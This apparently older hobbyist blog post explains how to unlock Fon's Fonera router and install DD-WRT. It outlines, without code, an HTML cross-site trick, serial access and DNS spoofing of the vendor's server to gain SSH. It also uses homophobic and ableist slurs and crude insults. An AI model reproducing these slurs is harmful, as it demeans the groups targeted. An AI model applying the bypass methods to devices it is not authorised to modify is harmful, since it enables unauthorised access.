Fonera Feever

Intro
I have been working with the some buddies and my long time on again/off again fuck buddy Google.com to do unpleastent and inappropriate things with the Fonera router. Fon is a worldwide community of people that are willing to share their wifi access with other users (for free) and have non fonners pay for time on the network. This is a great idea! Honestly, no more pirating Wifi... This is a global effort to make wifi available for everyone. Well, it WAS a great idea. Fon was selling Linksys WRT54G routers which natively run linux and are treasured by many people as a fun wireless linux toy. Fon was selling them for a mere $5 plus shipping. Not bad concidering they still run for $60. People jumped on the deal and started getting Fon Branded WRT routers, then taking them off the FON network for their own gain. Thats a really cunty thing to do. Here is a company not asking for much, loosing money trying to spread wifi arround... Im not going to get into morals or politics on that matter.

Fon learned their lesson the hard way. They tried another take on the free/cheap router deal. Now they have added some security and lockdowns so people cant steal Fon routers. This hasnt stopped people from doing it. To be honest, most of the people involved in the Fon Hacking scene arent trying to steal Fon routers, they want to unlock them and make them more usefull, powerfull, and configurable. I have a Fon and a Linksys WRT router, both are on the Fon Network (The WRT is not a fon brand, I just like the idea of the Fon community, so I added the Fon Function to it).

Preface
Fon uses the DD-WRT Router Firmware that was designed to replace the stock firmware on many routers, including the Linksys WRT series. It adds many usefull functions and abilities that even the most expensive "gaming", VoIP, or QoS routers dont have. Whats gret about it is you can add and remove features from the router as you need them, taloring it to your individual needs. Its a great project and really fun to be a part of. Fon based their firmware from DD-WRT which maks a really good foundation. They added and removed some stuff, as to be expected. All in all the Fon firmware is ok, but its a little lacking, and its really REALLY locked down. The only way to change a setting it so log into your Fon.com account, apply the settings there, and reboot the router. I dont like that. What if you have no internet access? What if something went horribly wrong? There (in my opinion) isnt enough user control at the local router to be a viable router or AP. Plus the tiny lil' Fon can do SO much more, so why the hell not?

Natively the Fon has some limits to what it can do out of the box. Even after you install DD-WRT there are some minor issues that need to be worked out.

Secure Shell
To install DD-WRT you need to gain SSH (secure shell) access to the system. There are 3 main ways of doing this right now as of this writing, and depending on your available hardware and Fon Firmware will determine what method you use.

Method 1: Cross Site "Exploit"
DD-WRT has a web-interface which allows you to type in commands as if it were a command window. Fon removed access to this. Using an HTML file you create and run in your web browser, you can regain access to this console. Go here for information on how to make the files needed. Basically take the HTML code provided and save it as Fon1.html and Fon2.html. The first patch of code will access the iptables of the system and allow access to the SSH port (Port 22). The second will send the command to run the DropBear SSH Server.

Method 2: Serial Access
The Fonera Wiki has information on how to hook to the Fon serial port and gain Shell access. From there you can run the console commands as stated in the previous method to add the iptable rule allowing access to the SSH port. Then you can start the DropBear SSH Server manually.

Method 3: DNS Spoofing
Here are instructions with an easy way of enabling SSH using DNS Spoofing. Remember when I mentioned the Fon calls home to get any system settings that have changed? Well, Stefans Datenbruch figured out a way to spoof the Fon DNS server and fool the hardware into enabling the SSH server, he nicknamed this Kolofonium. This was a very SLICK method of doing it, and to be honest, the ONLY way to get SSH enabled on the 0.7.1 r2 firmwares that are being shipped out.

Installing DD-WRT
Once you have SSH access you need to follow the simplified process of installing DD-WRT at Two Slashes. Nick (a buddy of mine from Techcentric) has put together a semi-clear how to process on getting DD-WRT going. The proeces is somthing like this:

1. Enable SSH
2. Via SSH make the FlashROM (FIS) writeable
3. Copy needed Fon DD-WRT files via SSH and 'wget'
4. Write new kernel, hex, etc... reboot
5. Log into RebBoot bootlader, using TFTP and nstall new booloader configuration.

Thats the simplified process. Its a wee bit more complex, but thats the short story.

Hop on irc.bsodirc.org (linked with irc.techcentric.org ) in Fonners if you need any help.

Shit that dont' work
DHCP Doesnt work on LAN for some reason

GPIO has been disabled, no SD card option.... yet

JFF2S Filesystem is disabled, needed for SD card support

Anything that uses rfmon like WiViz, Kismet, and Site Survey doesnt work properly, or at all.

Dual antenna is retarted. There isnt enugh space. (Dual antenna should be spaced as far apart as possible!)

The heatsink is SHIT! The thing constantly overheats


Ending blabber
Im working on a bunch of Fon stuff, but I need my laptop, it should be here soon. I use my couchputer, but its not designed to sit there and punch in SSH Commands, so I get uncomfortable after 10 minutes. Im focusing on hardware hacks, since thats my strongpoint. Adding a dual antenna is easy as sin, but the lack of space in the fon makes it a not-so-good idea. You dont want Ant1 broadcasting directly into Ant2. That can cause damage to the RF Modules, You need to place the antennas at LEAST 1 wavelength apart. For wifi thats almost 5 inches. Honestly as a radio guy, I would use at least 4 wavelengths to get higher diversity. I want to focus on SD Card support. Once you get an SD card in there the amount of packages you can install is damn near limitless. I want Site Survey, mainly kismet to work, but that can wait for now. Keep an eye on BSoD and TechCentric for some Fon stuff, or if you dont want to wait for us to do segments, pop on irc and join Fonners

Dont be a fag and steal Fon routers... And i dont mean the good kind that dress nice and smell pleasent. Im talking about the icky hippie fags that dress in rags and smell like farts and vasolene...